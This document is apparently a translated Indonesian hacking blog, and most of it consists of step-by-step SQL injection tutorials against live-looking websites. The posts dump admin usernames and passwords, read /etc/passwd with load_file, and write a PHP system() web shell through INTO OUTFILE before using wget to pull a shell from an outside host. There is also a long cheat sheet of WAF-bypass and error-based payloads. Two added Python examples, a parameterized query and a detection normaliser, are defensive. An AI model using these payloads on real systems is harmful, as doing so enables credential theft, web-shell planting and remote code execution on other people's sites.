Kamis, 21 Agustus 2014

w3af broken after update on Kali 1.0.7


The error:
w3af failed to start with the following message: Exception: "There was an error while importing w3af.plugins.output.console: "No module named darts.lib.utils.lru"."

The missing darts.lib.utils.lru module is provided by the DartsPyLRU package, so install it from source.

Fix:
apt-get install python-setuptools << if this errors, skip to the next step
git clone https://github.com/deterministic-arts/DartsPyLRU.git
cd DartsPyLRU
python setup.py install

Selasa, 01 Juli 2014

Double Query Based Injection

Assalamualaikum
Hello again, this time a tutorial on double query injection :D

The target is censored :D
http://janda.com/pro.php?id=8

Add a single quote and note the error.

Then we find the version with this query:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

The version: 5.0.96-log

Now find the database:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Result: information_schema
In +LIMIT+0,1 just change the offset, e.g. LIMIT 1,1, then LIMIT 2,1, and so on.

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
database: challanich

Now look for the tables of the challanich database:

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Lucky, the word admin shows up right away :D
table: ch_admin
As above, the LIMIT 0,1 can be changed the same way.

Okay, next: now let's look at the columns of the ch_admin table:

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Note the part in red.

Now change the limit again:

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=


janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

So to sum up, the important ones: user and password.

Now dump:
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
See the part in red.

Okay, that's all, thank you.
Hope it's useful :D
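The root cause in this post's pro.php?id= lookup is that the id is concatenated into the SQL text. Added example, not code from this blog: a constructed sqlite3 table with a string-built lookup beside a parameterized one, showing that the boolean tail of the payloads above changes the result (or produces the verbose error the first step looks for) only in the string-built version. The table, column and function names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the post's pro.php?id= lookup (sqlite3,
# not MySQL, so the rand()/floor() error trick itself is not reproduced here).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product(id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO product VALUES (?, ?)",
                    [(7, "alpha"), (8, "bravo"), (9, "charlie")])
    return con

def lookup_vulnerable(con, raw_id):
    # The request parameter is spliced into the SQL text, so "8 and 1=0" or
    # "8 or 1=1" is parsed as SQL, and a stray quote produces the verbose
    # error that the post's first step ("add a quote and watch the error")
    # looks for.
    sql = "SELECT id, name FROM product WHERE id=" + raw_id
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return ["error: " + str(e)]   # in production: log it, never echo it

def lookup_safe(con, raw_id):
    # Validate the type, then bind the value; it can no longer be parsed as SQL.
    try:
        pid = int(raw_id)
    except ValueError:
        return []
    return con.execute("SELECT id, name FROM product WHERE id=?", (pid,)).fetchall()

def compare(raw_id):
    """Run one request parameter through both lookups on a fresh database."""
    con = make_db()
    return lookup_vulnerable(con, raw_id), lookup_safe(con, raw_id)

if __name__ == "__main__":
    for raw in ("8", "8 and 1=1", "8 and 1=0", "8 or 1=1", "8'"):
        print(repr(raw), "->", compare(raw))
```

The same parameter binding applies to the MySQL/PHP targets on this page (mysqli prepared statements or PDO with bound parameters).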



Minggu, 01 Juni 2014

SQL Injection Load File

target:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI

Add a single quote:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'

SQLi error; use the query order by 2--

Now change it like this:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+
No more error.

Now use https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+


Look at the user:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+

There, root.
There are two requirements for this.

For creating any file on the website with SQL queries, two things are most important :)
1) Root path (we have it from the error :) )
2) File privileges for the current MySQL user :D we have file privileges as well :D
(On a hardened server neither holds: the application account has no FILE privilege, and secure_file_priv restricts or disables LOAD_FILE and INTO OUTFILE.)

Next:
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+
Then Ctrl+U (view source).

Next we look at the path so we know where uploads go; that is my layman's way of putting it :D

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+


First I test opening the path, e.g.
https://www.target.com/uploads/ << it exists; let's try whether we can write a file there

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

"wine ganteng" gets converted to hex :D

Now let's insert this to download a backdoor :P
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -

Then we use wget to download the shell with a .txt extension:
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
Then change the txt extension to php:
mv a.txt index(3)php

Then open it.

That's all, thank you :D
gretz to ch3rn0by1 | tr0jan | G_26 and you

Sabtu, 12 April 2014

Playing With SQLi Output

Assalamualaikum, just sharing :D

#PART 1
Display all tables in the database:
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -

#PART 2
Display all databases, tables and columns in one query:
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -

#PART 3
Display all tables with a running number:
/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -

#PART 4
Display the MySQL version and our name using HTML tags:
target/news.php?id=90'  div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -

#PART 5
Display and build an HTML table:
/news.php?id=90'  div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -

Okay, that's it for now, hope it's useful. See you next time.

Video SQLi Bypass Mod_Security


Assalamualaikum
This is a video about SQLi bypass of Mod_Security.

thanks for watching
Special thank to Ajakaro | MakMan | MadC0de | Fuad | G_26 | Ch3rn0by1 And Indonesian Backtrack Team

Jumat, 04 April 2014

Modified Hackbar add-on for Mozilla Firefox


Assalamualaikum

Hackbar is a Mozilla Firefox add-on used to test our systems, e.g. for SQLi and XSS.
Okay, straight to it: download the Hackbar modified by my friend T-Pro :D

http://www.mediafire.com/download/8pmciacmca3pgb7/hackbat_mod_by_tPRO_v1.4.1.rar

pass: /!"§$%&~hackforums~/()~TPRO~=?

Download and extract it.
Inside is a file with the .xpi extension.
Then copy it to C: > Program Files > Mozilla.
Then drag and drop it into Firefox and install it.
Result: Hackbar is installed.

Okay, that's all, thank you.

Senin, 31 Maret 2014

SQL Injection Cheat Sheet


Comments
/*      //Multi-line comment.
#       //Single-line comment.
--      //Single-line comment.
/*!*/   //MySQL special comments.

Whitespace
+, %2B, %20, %09, %0d, %0A, /**/, /*foo*/

Global system variables
@@datadir             //MySQL data directory.
@@version_compile_os  //OS MySQL is running on.
@@version             //MySQL database version.
user()                //Current database user.
@@log_error           //Path to error log.
database()            //Current database.

The INFORMATION_SCHEMA database is made up of the following objects:

SCHEMATA
TABLES
COLUMNS
STATISTICS
USER_PRIVILEGES
SCHEMA_PRIVILEGES
TABLE_PRIVILEGES
COLUMN_PRIVILEGES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
TABLE_CONSTRAINTS
KEY_COLUMN_USAGE
ROUTINES
VIEWS
TRIGGERS
PROFILING

Columns in a SELECT
file.php?var=1 order by 10-- //Unknown column '10' in 'order clause'
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)

Encoding //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11

File_priv
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user='root'-- //Checking for the file privilege of the current user, Y=Yes N=No.
file.php?var=1 union select load_file('/etc/passwd')-- //Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file('/etc/passwd'),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- //Loading system files with error based injection.
file.php?var=1 union select "<?php system($_GET[c]);?>" into outfile '/dir/dir/shell.php'-- //Write code to a file.
file.php?var=1 limit 1 into outfile '/dir/dir/shell.php' lines terminated by "<?php system($_GET[c]);?>"--+ //Write to a file.

WAF & security bypasses
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0x414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.

Extracting data from MySQL errors
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --

Name_const (MySQL 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--

Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error

Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--

Injecting into an order by
file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--

Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5))--

If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')

Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --

Create User
CREATE USER username IDENTIFIED BY 'password'; --

Drop User
DROP USER username; --

Make User a DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';

List Users
SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user

Getting user-defined tables
SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'

Getting column names (tblUsers -> table name)
SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers'

Find tables which have a column called 'username'
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

String without quotes
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))


Rabu, 26 Februari 2014

SQL Injection 'order by 10000' and still not error?


Assalamualaikum
Okay, as the title says.
The problem: in a SQL injection the order by query is blocked, or does not produce anything at all.

target: target.ac.id/bid/utama.php?mod=detail&id=77

Let's try the query:
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << does not show "unknown column"
Let's raise it: target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << same, shows nothing at all

Let's change the query to this:
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
Hmm, nothing comes out, just a blank page :v
Let's lower the order by value.

Wow, when it is lowered the text appears again.

So we assume there are 8 columns.
Let's test, and it turns out the magic number does not appear.

Let's change the query to this:
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

And tadaa, the magic number appears.
The rest is the same as the usual SQLi syntax.

That's it, hope it's useful.

Kamis, 30 Januari 2014

Bypass WAF filter in SQLI


Assalamualaikum
This time it is about how to bypass the WAF filter on a SQLi bug, manually; why manually? Because sqlmap is asleep :P
Okay, straight to it.
target:
http://www.target.com/ebookcontents.php?id=95'

Yep, a SQLi bug.
Then continue with the "order by" query to find the column count:
http://www.target.com/ebookcontents.php?id=95 order by 7--
Unknown column '7' in 'order clause'

Continue until you get it :D
Turns out there are 6 columns:
http://www.target.com/ebookcontents.php?id=95 order by 6--

Then find the magic number with the "union select" query:
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
The result is Not Acceptable; there is probably a WAF, so let's try to bypass it.
We replace "union select" with:
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--

Hey, it opens; here I pick number 3 :D
Let's see which MySQL version it runs:
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
It runs version 5.5.34-cll.

Next, let's look at the database contents with this query:
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
And the result is Not Acceptable; maybe the syntax has to be weirder, so let's try it this way:

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
And the result:

Heheh, it works; there is a lot in the "database", so let's focus on "users".
Enter this query:

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--

Hmm, there are a lot of tables,
here I pick the "users" table.

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+

And the result: id, email, password, date.

Let's dump :P

http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/

And the result:

A bonus:

Tips and tricks
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3--
6. id=1+UnIoN+SeLecT 1,2,3--
7. id=1+UnIOn/**/SeLect 1,2,3--
8. id=1+UNIunionON+SELselectECT 1,2,3--
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3--
10. id=1 and (select 1)=(Select 0xAA 1000 more A's)+UnIoN+SeLeCT 1,2,3--
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

And


UNION SELECT Bypassing ::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+'UnI''On'+'SeL''ECT' <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

After the id number, e.g. id=1 +/*!and*/+1=0

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

Ok, hope it's useful.
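For the defender, the double-query post, the cheat sheet's WAF section and the bypass list above all reduce to one question: does a filter see the same statement the database sees? Added example, not code from this blog: a Python normaliser that undoes the obfuscations listed here and then matches a few signatures for the page's techniques, run over constructed sample query strings shaped like the payloads above. Signature names and samples are assumptions.

```python
import re
from urllib.parse import unquote

def normalize(query: str) -> str:
    """Undo the obfuscations listed on this page before signature matching:
    '+' for space, double URL-encoding (%2555nion), MySQL version comments
    (/*!50000select*/), filler comments (/**/, /*foo*/), '#...%0a' line
    comments and mixed case. A comment becomes a space because MySQL treats
    it as a token separator, so 'uni/**/on' is NOT folded into 'union'."""
    s = query
    for _ in range(2):                         # second pass catches %25xx
        s = unquote(s.replace("+", " "))
    s = re.sub(r"/\*!\d*", " ", s)             # /*!50000select*/ -> select*/
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = s.replace("*/", " ")                   # closers left by version comments
    s = re.sub(r"#[^\n]*\n", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

# Signatures for the techniques shown on this page, matched on normalised text.
SIGNATURES = {
    "error_based_double_query": re.compile(
        r"count\(\s*\*\s*\).*floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\).*\bgroup by\b"),
    "union_select": re.compile(r"\bunion\b(\s+(all|distinct|distinctrow))?\s+select\b"),
    "file_read_write": re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns|schemata)\b"),
    "xpath_error": re.compile(r"\b(extractvalue|updatexml)\s*\("),
}

def detect(query: str) -> list:
    """Sorted names of the signatures that match one raw query string."""
    n = normalize(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(n))

# Constructed sample query strings in the shape of this page's payloads.
SAMPLES = {
    "benign_id": "id=8",
    "benign_words": "q=trade+union+members",
    "double_query": "id=8+and(select+1+from(select+count(*),concat((select+version()),"
                    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1",
    "version_comment": "id=-95/*!union*//*!select*/1,2,concat/*!50000(group_concat(table_name))*/"
                       ",4,5,6+from+information_schema.tables+where+table_schema=database()--",
    "encoded_keyword": "id=1+%55nion all /*!12345%53elect*/ 1,version(),3--",
    "hash_newline": "id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2,3--",
    "load_file": "state=PANAJI'+union+select+load_file(0x2f6574632f706173737764)--+",
    "xpath": "var=1+and+extractvalue(rand(),concat(0x3a,version()))--",
}

def scan_all() -> dict:
    """Map every sample name to the signatures it triggers."""
    return {name: detect(q) for name, q in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:16} -> {hits or 'clean'}")
```

Splicing tricks such as UNIunionON only work against a filter that deletes a keyword and passes the rest through; the normaliser leaves them alone because the correct response to a match is to reject the request, not to repair it.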